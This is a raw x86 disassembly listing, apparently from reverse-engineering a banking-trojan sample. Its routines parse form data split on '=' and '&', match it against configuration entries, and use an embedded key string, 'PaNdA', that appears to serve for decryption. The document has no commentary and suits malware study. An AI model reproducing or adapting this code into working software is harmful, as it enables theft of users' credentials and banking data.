loc_40C65A: ; CODE XREF: sub_40C5E7+54�j
and dword ptr [esi+4], 0
retn
sub_40C5E7 endp
; ---------------------------------------------------------------------------
imul eax, 38h
add eax, dword_4102EC
push esi
mov esi, eax
call sub_40C5E7
mov eax, dword_4102E8
test eax, eax
jbe short loc_40C6BD
mov ecx, dword_4102EC
mov edx, eax
imul edx, 38h
lea edx, [edx+ecx-38h]
cmp esi, edx
jnz short loc_40C6BD
cmp eax, 1
jnz short loc_40C6A7
push ecx
call sub_409317
and dword_4102EC, 0
and dword_4102E8, 0
jmp short loc_40C6BC
; ---------------------------------------------------------------------------
loc_40C6A7: ; CODE XREF: .text:0040C68F�j
dec eax
mov dword_4102E8, eax
imul eax, 38h
push eax
push offset dword_4102EC
call sub_40B3C4
pop ecx
loc_40C6BC: ; CODE XREF: .text:0040C6A5�j
pop ecx
loc_40C6BD: ; CODE XREF: .text:0040C677�j
; .text:0040C68A�j
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C6BF proc near ; CODE XREF: .text:0040CAAA�p
; sub_40CE51+1DD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [esi+420h]
push edi
call sub_40C53B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C6EF
push 0
push edi
call sub_40C56A
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_40C6EF
loc_40C6E8: ; CODE XREF: sub_40C6BF+8E�j
xor al, al
jmp loc_40C77B
; ---------------------------------------------------------------------------
loc_40C6EF: ; CODE XREF: sub_40C6BF+18�j
; sub_40C6BF+27�j
test byte ptr [esi+424h], 1
jnz short loc_40C724
mov edx, [ebp+arg_4]
imul eax, 38h
mov ecx, [ebp+arg_8]
mov [esi+42Ch], ecx
mov [esi+428h], edx
mov ecx, dword_4102EC
add ecx, eax
or dword ptr [ecx], 10h
mov ecx, dword_4102EC
mov [eax+ecx+34h], edx
jmp short loc_40C779
; ---------------------------------------------------------------------------
loc_40C724: ; CODE XREF: sub_40C6BF+37�j
push 28h
push dword ptr [esi+430h]
mov edi, eax
imul edi, 38h
call sub_40936D
pop ecx
pop ecx
mov ecx, dword_4102EC
mov [edi+ecx+34h], eax
mov eax, dword_4102EC
mov ecx, [edi+eax+34h]
test ecx, ecx
jz short loc_40C6E8
mov edx, [ebp+arg_4]
lea eax, [esi+428h]
mov [eax], ecx
mov dword ptr [esi+42Ch], 28h
mov [ecx+14h], edx
mov eax, [eax]
mov ecx, [ebp+arg_8]
mov [eax+18h], ecx
mov eax, dword_4102EC
add eax, edi
or dword ptr [eax], 20h
loc_40C779: ; CODE XREF: sub_40C6BF+63�j
mov al, 1
loc_40C77B: ; CODE XREF: sub_40C6BF+2B�j
pop edi
pop esi
pop ebp
retn
sub_40C6BF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 64h
push edi
mov edi, [ebp+8]
cmp dword ptr [edi+41Ch], 8
jnb short loc_40C799
xor al, al
jmp loc_40CBC1
; ---------------------------------------------------------------------------
loc_40C799: ; CODE XREF: .text:0040C790�j
and dword ptr [ebp-18h], 0
lea eax, [ebp-18h]
push eax
push 3F6h
call sub_4035F5
cmp eax, 10h
pop ecx
pop ecx
mov [ebp-14h], eax
mov byte ptr [ebp-3], 0
jbe loc_40CBB5
push esi
mov esi, [ebp-18h]
loc_40C7C1: ; CODE XREF: .text:0040C89D�j
movzx ecx, word ptr [esi]
sub ecx, [ebp-18h]
add ecx, esi
cmp ecx, eax
ja loc_40CBB4
movzx eax, word ptr [esi+8]
test ax, ax
jz loc_40C88B
movzx eax, ax
add eax, esi
push eax
mov [ebp-10h], eax
call dword_40FD94 ; lstrlenA
mov [ebp-1Ch], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [edi+400h]
push edi
push dword ptr [ebp-1Ch]
push dword ptr [ebp-10h]
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40C88B
movzx eax, word ptr [esi+0Ah]
xor ecx, ecx
cmp ax, cx
jz short loc_40C849
push ecx
push ecx
push ecx
push dword ptr [edi+41Ch]
movzx eax, ax
push dword ptr [edi+418h]
add eax, esi
push eax
mov [ebp-24h], eax
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [ebp-24h]
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40C88B
xor ecx, ecx
loc_40C849: ; CODE XREF: .text:0040C817�j
movzx eax, word ptr [esi+0Ch]
cmp ax, cx
jz short loc_40C8A8
movzx eax, ax
add eax, esi
cmp byte ptr [eax], 2Ah
mov [ebp-24h], eax
jnz short loc_40C865
cmp byte ptr [eax+1], 0
jz short loc_40C8A8
loc_40C865: ; CODE XREF: .text:0040C85D�j
push ecx
push ecx
push ecx
push dword ptr [edi+41Ch]
push dword ptr [edi+418h]
push eax
call dword_40FD94 ; lstrlenA
push eax
push dword ptr [ebp-24h]
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40C8A8
loc_40C88B: ; CODE XREF: .text:0040C7D8�j
; .text:0040C80C�j ...
movzx eax, word ptr [esi]
add esi, eax
mov eax, [ebp-14h]
mov ecx, esi
sub ecx, [ebp-18h]
add ecx, 10h
cmp ecx, eax
jb loc_40C7C1
jmp loc_40CBB4
; ---------------------------------------------------------------------------
loc_40C8A8: ; CODE XREF: .text:0040C850�j
; .text:0040C863�j ...
cmp byte ptr [esi+6], 9
jbe short loc_40C8B2
mov byte ptr [esi+6], 0
loc_40C8B2: ; CODE XREF: .text:0040C8AC�j
cmp byte ptr [esi+4], 0
jnz short loc_40C8BC
mov byte ptr [esi+4], 1
loc_40C8BC: ; CODE XREF: .text:0040C8B6�j
mov al, [esi+6]
test al, al
mov [ebp-2], al
jnz short loc_40C8CA
mov byte ptr [ebp-2], 6
loc_40C8CA: ; CODE XREF: .text:0040C8C4�j
mov eax, [edi+418h]
mov edi, [edi+41Ch]
add edi, eax
and dword ptr [ebp-14h], 0
mov [ebp-20h], edi
mov edx, eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40C8E6: ; CODE XREF: .text:0040C992�j
cmp byte ptr [eax], 3Dh
jnz loc_40C98C
movzx ecx, word ptr [esi+0Eh]
test cx, cx
mov byte ptr [ebp-1], 0
jz short loc_40C929
movzx edi, cx
xor ecx, ecx
push ecx
push ecx
push ecx
sub eax, edx
push eax
push edx
add edi, esi
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_408CFB
mov edi, [ebp-20h]
add esp, 1Ch
test al, al
mov eax, [ebp-8]
jnz short loc_40C929
mov byte ptr [ebp-1], 1
loc_40C929: ; CODE XREF: .text:0040C8FA�j
; .text:0040C923�j
mov cl, [esi+5]
test cl, cl
jz short loc_40C93E
inc dword ptr [ebp-14h]
movzx ecx, cl
cmp ecx, [ebp-14h]
jz short loc_40C93E
inc byte ptr [ebp-1]
loc_40C93E: ; CODE XREF: .text:0040C92E�j
; .text:0040C939�j
mov edx, eax
mov [ebp-0Ch], eax
loc_40C943: ; CODE XREF: .text:0040C94E�j
cmp edx, edi
jnb short loc_40C950
inc edx
cmp byte ptr [edx], 26h
mov [ebp-0Ch], edx
jnz short loc_40C943
loc_40C950: ; CODE XREF: .text:0040C945�j
cmp byte ptr [ebp-1], 0
jnz short loc_40C988
movzx ecx, byte ptr [ebp-2]
sub edx, eax
dec edx
cmp edx, ecx
jnz short loc_40C988
push ecx
inc eax
push eax
call sub_4092D3
test al, al
pop ecx
pop ecx
jz short loc_40C985
push dword ptr [ebp-1Ch]
lea eax, [ebp-44h]
push dword ptr [ebp-10h]
push eax
call sub_40A1D3
add esp, 0Ch
test al, al
jnz short loc_40C99D
loc_40C985: ; CODE XREF: .text:0040C96D�j
mov eax, [ebp-8]
loc_40C988: ; CODE XREF: .text:0040C954�j
; .text:0040C95F�j
mov edx, [ebp-0Ch]
inc edx
loc_40C98C: ; CODE XREF: .text:0040C8E9�j
inc eax
loc_40C98D: ; CODE XREF: .text:0040C8E1�j
cmp eax, edi
mov [ebp-8], eax
jb loc_40C8E6
jmp loc_40CBB4
; ---------------------------------------------------------------------------
loc_40C99D: ; CODE XREF: .text:0040C983�j
movzx edi, byte ptr [ebp-2]
inc dword ptr [ebp-8]
push edi
push dword ptr [ebp-8]
lea eax, [ebp-34h]
push eax
mov [ebp-14h], edi
call sub_409331
lea eax, [ebp-34h]
push eax
mov byte ptr [ebp+edi-34h], 0
call sub_409054
and dword ptr [ebp-10h], 0
mov [ebp-20h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-44h]
push eax
call sub_40A476
and dword ptr [ebp-1Ch], 0
add esp, 18h
test al, 3
mov [ebp-0Ch], eax
jz short loc_40C9E8
and dword ptr [ebp-0Ch], 0
loc_40C9E8: ; CODE XREF: .text:0040C9E2�j
push 4
pop eax
cmp [ebp-0Ch], eax
jb short loc_40C9FA
mov eax, [ebp-10h]
mov eax, [eax]
mov [ebp-1Ch], eax
jmp short loc_40C9FD
; ---------------------------------------------------------------------------
loc_40C9FA: ; CODE XREF: .text:0040C9EE�j
mov [ebp-0Ch], eax
loc_40C9FD: ; CODE XREF: .text:0040C9F8�j
movzx ecx, byte ptr [esi+4]
mov eax, [ebp-1Ch]
xor edx, edx
div ecx
neg edx
sbb dl, dl
shr dword ptr [ebp-0Ch], 2
xor eax, eax
inc dl
inc eax
cmp [ebp-0Ch], eax
mov [ebp-1], dl
jbe short loc_40CA3A
loc_40CA1D: ; CODE XREF: .text:0040CA2C�j
mov ecx, [ebp-20h]
mov edi, [ebp-10h]
cmp [edi+eax*4], ecx
jz short loc_40CA30
inc eax
cmp eax, [ebp-0Ch]
jb short loc_40CA1D
jmp short loc_40CA37
; ---------------------------------------------------------------------------
loc_40CA30: ; CODE XREF: .text:0040CA26�j
mov byte ptr [ebp-1], 2
mov dl, [ebp-1]
loc_40CA37: ; CODE XREF: .text:0040CA2E�j
mov edi, [ebp-14h]
loc_40CA3A: ; CODE XREF: .text:0040CA1B�j
test dl, dl
jbe short loc_40CABC
mov eax, [ebp+8]
push dword ptr [eax+41Ch]
push dword ptr [eax+418h]
call sub_40936D
mov edi, eax
test edi, edi
pop ecx
pop ecx
mov [ebp-24h], edi
jz loc_40CB65
mov eax, [ebp+8]
sub edi, [eax+418h]
add edi, [ebp-8]
test byte ptr [esi+2], 1
jz short loc_40CA8F
mov eax, [ebp-14h]
lea esi, [eax+edi]
jmp short loc_40CA89
; ---------------------------------------------------------------------------
loc_40CA7B: ; CODE XREF: .text:0040CA8B�j
push 39h
push 30h
call sub_409B94
pop ecx
mov [edi], al
pop ecx
inc edi
loc_40CA89: ; CODE XREF: .text:0040CA79�j
cmp edi, esi
jb short loc_40CA7B
jmp short loc_40CA9D
; ---------------------------------------------------------------------------
loc_40CA8F: ; CODE XREF: .text:0040CA71�j
push dword ptr [ebp-14h]
push 31h
push edi
call sub_409395
add esp, 0Ch
loc_40CA9D: ; CODE XREF: .text:0040CA8D�j
mov eax, [ebp+8]
push dword ptr [eax+41Ch]
push dword ptr [ebp-24h]
push eax
call sub_40C6BF
add esp, 0Ch
test al, al
jz short loc_40CAD2
mov dl, [ebp-1]
mov edi, [ebp-14h]
loc_40CABC: ; CODE XREF: .text:0040CA3C�j
cmp dl, 1
mov eax, dword_40FB34
mov byte ptr [ebp-3], 1
jnz short loc_40CAE0
mov eax, [eax+1B4h]
jmp short loc_40CAE6
; ---------------------------------------------------------------------------
loc_40CAD2: ; CODE XREF: .text:0040CAB4�j
push dword ptr [ebp-24h]
call sub_409317
pop ecx
jmp loc_40CB65
; ---------------------------------------------------------------------------
loc_40CAE0: ; CODE XREF: .text:0040CAC8�j
mov eax, [eax+1B8h]
loc_40CAE6: ; CODE XREF: .text:0040CAD0�j
push eax
mov [ebp+8], eax
call dword_40FD94 ; lstrlenA
mov ecx, [ebx]
mov esi, [ebp+0Ch]
add ecx, edi
mov [ebp-14h], eax
lea eax, [ecx+eax+14h]
push eax
push esi
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_40CB65
push edi
push offset a0Uu ; "%%0%uu"
lea eax, [ebp-54h]
push 0Fh
push eax
call dword_40FC88
push dword ptr [ebp-20h]
lea eax, [ebp-54h]
push eax
lea eax, [ebp-64h]
push 0Fh
push eax
call dword_40FC88
push dword ptr [ebp-14h]
mov eax, [esi]
add eax, [ebx]
push dword ptr [ebp+8]
push eax
call sub_409331
mov eax, [ebp-14h]
add [ebx], eax
mov eax, [ebx]
push edi
lea ecx, [ebp-64h]
push ecx
mov ecx, [esi]
add ecx, eax
push ecx
call sub_409331
add [ebx], edi
mov eax, [ebx]
mov ecx, [esi]
add esp, 38h
mov byte ptr [eax+ecx], 0Ah
inc dword ptr [ebx]
loc_40CB65: ; CODE XREF: .text:0040CA5B�j
; .text:0040CADB�j ...
mov esi, [ebp-0Ch]
lea eax, [esi+4]
push eax
lea eax, [ebp-10h]
push eax
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_40CBAB
cmp byte ptr [ebp-1], 2
jz short loc_40CB8A
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
inc eax
mov [ecx], eax
loc_40CB8A: ; CODE XREF: .text:0040CB7F�j
mov ecx, [ebp-10h]
mov edx, [ebp-20h]
mov eax, esi
shl eax, 2
mov [eax+ecx], edx
add eax, 4
push eax
push dword ptr [ebp-10h]
lea eax, [ebp-44h]
push eax
call sub_40A4C3
add esp, 0Ch
loc_40CBAB: ; CODE XREF: .text:0040CB79�j
push dword ptr [ebp-10h]
call sub_409317
pop ecx
loc_40CBB4: ; CODE XREF: .text:0040C7CB�j
; .text:0040C8A3�j ...
pop esi
loc_40CBB5: ; CODE XREF: .text:0040C7B7�j
push dword ptr [ebp-18h]
call sub_409317
mov al, [ebp-3]
pop ecx
loc_40CBC1: ; CODE XREF: .text:0040C794�j
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CBC4 proc near ; CODE XREF: sub_40E286+188�p
; sub_40E286+1B3�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
arg_C = word ptr 14h
arg_10 = word ptr 18h
arg_14 = word ptr 1Ch
arg_18 = word ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
push dword ptr [esi+420h]
and [ebp+var_C], 0
and [ebp+var_10], 0
mov [ebp+var_1], 0
call sub_40C53B
cmp eax, 0FFFFFFFFh
pop ecx
jnz loc_40CD40
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call sub_4035F5
mov [ebp+var_8], eax
movzx eax, [ebp+arg_4]
cmp [ebp+var_8], eax
pop ecx
pop ecx
jbe loc_40CD37
sub [ebp+var_8], eax
xor eax, eax
cmp byte ptr [esi+404h], 50h
push edi
mov edi, [ebp+var_C]
setnz al
push ebx
inc eax
movzx eax, ax
mov [ebp+var_14], eax
loc_40CC24: ; CODE XREF: sub_40CBC4+168�j
movzx eax, [ebp+arg_8]
mov ax, [eax+edi]
and ax, word ptr [ebp+var_14]
cmp ax, word ptr [ebp+var_14]
jnz loc_40CD15
movzx eax, [ebp+arg_C]
movzx eax, word ptr [eax+edi]
test ax, ax
jz loc_40CD15
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push dword ptr [esi+400h]
add ebx, edi
push esi
push ebx
mov [ebp+var_18], ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_408CFB
add esp, 1Ch
test al, al
jz loc_40CD15
mov ecx, [esi+41Ch]
test ecx, ecx
jz short loc_40CCF3
movzx eax, [ebp+arg_10]
movzx eax, word ptr [eax+edi]
test ax, ax
jz short loc_40CCB8
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push ecx
push dword ptr [esi+418h]
add ebx, edi
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_408CFB
add esp, 1Ch
test al, al
jnz short loc_40CD15
mov ebx, [ebp+var_18]
loc_40CCB8: ; CODE XREF: sub_40CBC4+C9�j
movzx eax, [ebp+arg_14]
movzx eax, word ptr [eax+edi]
test ax, ax
jz short loc_40CCF3
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push dword ptr [esi+41Ch]
add ebx, edi
push dword ptr [esi+418h]
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40CD15
mov ebx, [ebp+var_18]
loc_40CCF3: ; CODE XREF: sub_40CBC4+BC�j
; sub_40CBC4+FF�j
push 1
push ebx
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_40B154
add esp, 0Ch
test al, al
jnz short loc_40CD15
push edi
push esi
push [ebp+var_10]
call [ebp+arg_1C]
test eax, eax
jg short loc_40CD31
jl short loc_40CD35
loc_40CD15: ; CODE XREF: sub_40CBC4+70�j
; sub_40CBC4+81�j ...
movzx eax, [ebp+arg_18]
movzx eax, word ptr [eax+edi]
add edi, eax
mov eax, edi
sub eax, [ebp+var_C]
cmp eax, [ebp+var_8]
jnb short loc_40CD35
inc [ebp+var_10]
jmp loc_40CC24
; ---------------------------------------------------------------------------
loc_40CD31: ; CODE XREF: sub_40CBC4+14D�j
mov [ebp+var_1], 1
loc_40CD35: ; CODE XREF: sub_40CBC4+14F�j
; sub_40CBC4+163�j
pop ebx
pop edi
loc_40CD37: ; CODE XREF: sub_40CBC4+3F�j
push [ebp+var_C]
call sub_409317
pop ecx
loc_40CD40: ; CODE XREF: sub_40CBC4+21�j
mov al, [ebp+var_1]
leave
retn
sub_40CBC4 endp
; =============== S U B R O U T I N E =======================================
sub_40CD45 proc near ; CODE XREF: sub_40E286+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_4102F0
push esi
xor esi, esi
cmp eax, esi
jz short loc_40CDB9
cmp dword_4102F4, esi
jz short loc_40CDB9
push esi
push esi
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push eax
call dword_40FD94 ; lstrlenA
push eax
push dword_4102F0
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40CDB9
push 1
push dword_4102F4
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_40B3E4
push dword_4102F0
call sub_409317
push dword_4102F4
call sub_409317
add esp, 14h
mov dword_4102F0, esi
mov dword_4102F4, esi
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_40CDB9: ; CODE XREF: sub_40CD45+A�j
; sub_40CD45+12�j ...
xor al, al
pop esi
retn
sub_40CD45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CDBD proc near ; CODE XREF: sub_40CDBD+89�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
push esi
push 4
pop esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push 1
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
jz short loc_40CE1D
cmp [ebp+var_8], 0
jz short loc_40CE1D
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
push 2Dh
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
mov eax, [ebp+var_C]
jnz short loc_40CE0B
mov eax, [ebp+arg_4]
loc_40CE0B: ; CODE XREF: sub_40CDBD+49�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push eax
push [ebp+arg_0]
call [ebp+var_8]
jmp short loc_40CE4E
; ---------------------------------------------------------------------------
loc_40CE1D: ; CODE XREF: sub_40CDBD+26�j
; sub_40CDBD+2C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_0]
push eax
push 15h
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
jz short loc_40CE4E
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CDBD
add esp, 14h
loc_40CE4E: ; CODE XREF: sub_40CDBD+5E�j
; sub_40CDBD+78�j
pop esi
leave
retn
sub_40CDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CE51 proc near ; CODE XREF: sub_40E286+1B9�p
var_410 = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [esi+41Ch], ebx
jnz short loc_40CE70
xor eax, eax
jmp loc_40D054
; ---------------------------------------------------------------------------
loc_40CE70: ; CODE XREF: sub_40CE51+16�j
lea eax, [ebp+var_14]
push eax
push 3F3h
mov [ebp+var_C], ebx
mov [ebp+var_14], ebx
call sub_4035F5
cmp eax, ebx
pop ecx
pop ecx
jz loc_40D051
push eax
push [ebp+var_14]
call sub_408CAE
test al, al
pop ecx
pop ecx
jz loc_40D048
push edi
mov edi, [ebp+var_14]
loc_40CEA5: ; CODE XREF: sub_40CE51+81�j
push ebx
push ebx
push ebx
push dword ptr [esi+400h]
push esi
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_408CFB
add esp, 1Ch
test al, al
jnz short loc_40CED9
push 2
push edi
call sub_408CD4
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jnz short loc_40CEA5
jmp loc_40D047
; ---------------------------------------------------------------------------
loc_40CED9: ; CODE XREF: sub_40CE51+71�j
push 1
push edi
call sub_408CD4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_28], eax
jz loc_40D047
mov ebx, [esi+418h]
mov edi, [esi+41Ch]
and [ebp+var_10], 0
and [ebp+var_8], 0
add edi, ebx
cmp ebx, edi
mov [ebp+var_1C], edi
jnb loc_40D047
loc_40CF0F: ; CODE XREF: sub_40CE51+1C1�j
mov ecx, [ebp+var_28]
mov eax, ebx
mov [ebp+var_20], ecx
cmp ebx, edi
jmp short loc_40CF23
; ---------------------------------------------------------------------------
loc_40CF1B: ; CODE XREF: sub_40CE51+D5�j
cmp byte ptr [eax], 3Dh
jz short loc_40CF28
inc eax
cmp eax, edi
loc_40CF23: ; CODE XREF: sub_40CE51+C8�j
mov [ebp+var_18], eax
jb short loc_40CF1B
loc_40CF28: ; CODE XREF: sub_40CE51+CD�j
cmp eax, edi
jz loc_40D021
mov esi, eax
sub esi, ebx
cmp byte ptr [ecx], 0
mov [ebp+var_1], 1
jz short loc_40CFB3
jmp short loc_40CF42
; ---------------------------------------------------------------------------
loc_40CF3F: ; CODE XREF: sub_40CE51+154�j
mov ecx, [ebp+var_20]
loc_40CF42: ; CODE XREF: sub_40CE51+EC�j
mov al, [ecx]
mov edi, ecx
jmp short loc_40CF4F
; ---------------------------------------------------------------------------
loc_40CF48: ; CODE XREF: sub_40CE51+103�j
cmp al, 3Bh
jz short loc_40CF56
inc edi
mov al, [edi]
loc_40CF4F: ; CODE XREF: sub_40CE51+F5�j
test al, al
mov [ebp+var_24], edi
jnz short loc_40CF48
loc_40CF56: ; CODE XREF: sub_40CE51+F9�j
sub edi, ecx
push edi
push ecx
lea eax, [ebp+var_410]
push eax
call sub_409331
push esi
lea eax, [ebp+var_410]
push ebx
push eax
mov [ebp+edi+var_410], 0
call sub_409331
push edi
push esi
push [ebp+var_20]
mov [ebp+esi+var_410], 0
push ebx
call sub_408F6D
add esp, 28h
test eax, eax
jz short loc_40CFA9
mov eax, [ebp+var_24]
cmp byte ptr [eax], 0
jz short loc_40CFB0
inc eax
cmp byte ptr [eax], 0
mov [ebp+var_20], eax
jnz short loc_40CF3F
jmp short loc_40CFB0
; ---------------------------------------------------------------------------
loc_40CFA9: ; CODE XREF: sub_40CE51+143�j
inc [ebp+var_C]
mov [ebp+var_1], 0
loc_40CFB0: ; CODE XREF: sub_40CE51+14B�j
; sub_40CE51+156�j
mov edi, [ebp+var_1C]
loc_40CFB3: ; CODE XREF: sub_40CE51+EA�j
mov esi, [ebp+var_18]
jmp short loc_40CFC1
; ---------------------------------------------------------------------------
loc_40CFB8: ; CODE XREF: sub_40CE51+172�j
cmp byte ptr [esi], 26h
jz short loc_40CFC5
inc esi
mov [ebp+var_18], esi
loc_40CFC1: ; CODE XREF: sub_40CE51+165�j
cmp esi, edi
jb short loc_40CFB8
loc_40CFC5: ; CODE XREF: sub_40CE51+16A�j
cmp [ebp+var_1], 0
jz short loc_40D009
mov eax, [ebp+var_8]
sub esi, ebx
lea eax, [esi+eax+1]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_40D01A
mov eax, [ebp+var_8]
test eax, eax
jz short loc_40CFF6
mov ecx, [ebp+var_10]
mov byte ptr [eax+ecx], 26h
inc eax
mov [ebp+var_8], eax
loc_40CFF6: ; CODE XREF: sub_40CE51+198�j
mov ecx, [ebp+var_10]
push esi
add eax, ecx
push ebx
push eax
call sub_409331
add esp, 0Ch
add [ebp+var_8], esi
loc_40D009: ; CODE XREF: sub_40CE51+178�j
mov ebx, [ebp+var_18]
mov esi, [ebp+arg_0]
inc ebx
cmp ebx, edi
jb loc_40CF0F
jmp short loc_40D021
; ---------------------------------------------------------------------------
loc_40D01A: ; CODE XREF: sub_40CE51+191�j
and [ebp+var_C], 0
mov esi, [ebp+arg_0]
loc_40D021: ; CODE XREF: sub_40CE51+D9�j
; sub_40CE51+1C7�j
cmp [ebp+var_C], 0
jz short loc_40D047
push [ebp+var_8]
push [ebp+var_10]
push esi
call sub_40C6BF
add esp, 0Ch
test al, al
jnz short loc_40D047
push [ebp+var_10]
and [ebp+var_C], 0
call sub_409317
pop ecx
loc_40D047: ; CODE XREF: sub_40CE51+83�j
; sub_40CE51+97�j ...
pop edi
loc_40D048: ; CODE XREF: sub_40CE51+4A�j
push [ebp+var_14]
call sub_409317
pop ecx
loc_40D051: ; CODE XREF: sub_40CE51+37�j
mov eax, [ebp+var_C]
loc_40D054: ; CODE XREF: sub_40CE51+1A�j
pop esi
pop ebx
leave
retn
sub_40CE51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D058 proc near ; DATA XREF: sub_40E286:loc_40E423�o
; sub_41F7AC:loc_41F949�o
var_28 = byte ptr -28h
var_18 = byte ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov edi, [ebp+arg_8]
movzx esi, word ptr [edi+4]
add esi, edi
test byte ptr [edi+2], 80h
mov [ebp+var_8], esi
jz short loc_40D0D7
push esi
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp+var_28]
push esi
push eax
call sub_40A1D3
and [ebp+arg_8], 0
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_28]
push eax
call sub_40A476
add esp, 14h
cmp eax, 10h
jnz short loc_40D0CD
lea eax, [ebp+var_18]
push eax
call dword_40FE8C ; GetSystemTime
mov eax, [ebp+arg_8]
mov cx, [eax+6]
cmp cx, [ebp+var_12]
jnz short loc_40D0D0
mov cx, [eax+2]
cmp cx, [ebp+var_16]
jnz short loc_40D0D0
push eax
call sub_409317
pop ecx
or eax, 0FFFFFFFFh
jmp loc_40D1CF
; ---------------------------------------------------------------------------
loc_40D0CD: ; CODE XREF: sub_40D058+43�j
mov eax, [ebp+arg_8]
loc_40D0D0: ; CODE XREF: sub_40D058+5A�j
; sub_40D058+64�j
push eax
call sub_409317
pop ecx
loc_40D0D7: ; CODE XREF: sub_40D058+18�j
and [ebp+var_4], 0
push ebx
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_0]
add eax, 0FFFFEA60h
push eax
or esi, 0FFFFFFFFh
call sub_4035F5
mov ebx, eax
cmp ebx, 12h
pop ecx
pop ecx
jb loc_40D1CC
mov eax, [ebp+arg_4]
push 1
push dword ptr [eax+420h]
call sub_40C56A
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz loc_40D1CC
imul eax, 38h
add eax, dword_4102EC
mov esi, eax
mov eax, [ebp+var_4]
mov [esi+20h], eax
mov [esi+24h], ebx
movzx eax, word ptr [edi+0Ch]
test ax, ax
jz short loc_40D148
movzx eax, ax
add eax, edi
push 0FFFFFFFFh
push eax
call sub_40A747
pop ecx
pop ecx
mov [esi+30h], eax
loc_40D148: ; CODE XREF: sub_40D058+DC�j
movzx eax, word ptr [edi+0Ah]
test ax, ax
jz short loc_40D163
movzx eax, ax
add eax, edi
push 0FFFFFFFFh
push eax
call sub_40A747
pop ecx
pop ecx
mov [esi+28h], eax
loc_40D163: ; CODE XREF: sub_40D058+F7�j
cmp dword ptr [esi+28h], 0
jnz short loc_40D16F
test byte ptr [edi+2], 80h
jz short loc_40D17E
loc_40D16F: ; CODE XREF: sub_40D058+10F�j
push 0FFFFFFFFh
push [ebp+var_8]
call sub_40A747
pop ecx
pop ecx
mov [esi+2Ch], eax
